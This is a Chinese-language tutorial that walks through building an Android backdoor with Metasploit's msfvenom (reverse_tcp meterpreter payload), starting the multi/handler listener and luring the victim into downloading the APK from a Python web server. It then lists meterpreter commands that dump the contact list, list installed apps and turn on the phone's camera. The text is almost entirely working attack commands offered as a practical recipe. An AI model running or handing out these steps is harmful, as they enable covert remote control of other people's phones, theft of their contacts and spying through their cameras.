一、Metasploit及其监听模块介绍
Metasploit是一个免费的、可下载的框架,通过可以容易地地获取、开发并对计算机软件漏洞实施攻击。它本身附带数千个已知软件漏洞的专业漏洞攻击工具。
辅助模块(auxiliary)进行信息收集,执行扫描的功能。
渗透攻击模块(exploit)用于实际进行渗透攻击,得到一定的权限
攻击载荷模块(payload)把权限持久化,目标系统被成功渗透后执行的代码
后渗透攻击模块(post)进一步渗透测试:提权
handler 监听后门模块
use exploit/multi/handler
(使用handler监听模块)
(设置攻击载荷模块)
set payload android/meterpreter/reverse_tcp
二、手机端渗透原理
利用msfvenom生成apk木马,攻击者通过链接给用户通过下载木马程序下载到手机端,前提在同一局域网下。当用户点击下载的木马程序,攻击者就可以通过木马远程控制对方含有木马的安卓手机端。
三、制作恶意软件并获取shell权限
生成android后门
msfvenom -p android/meterpreter/reverse_tcp lhost=本地IP lport=4444 > shell.apk
开启并使用msf中监听
* use exploit/multi/handler
* set payload android/meterpreter/reverse_tcp
* set lhost 本地ip
* set lport 4444
* run
下载apk
在kali中apk后门所在目录开启web服务:python -m SimpleHTTPServer
在安卓浏览器里访问网址下载apk
四、实战:远程控制
成功拿到msf中会建立会话,分别通过
执行命令
sysinfo 查看系统信息
app_list 查看安装app文件
check_root 检测系统root
dump_contacts 下载通讯录信息
webcam_list 获取摄像头信息
webcam_stream 开启摄像头
成功调用安卓摄像头。
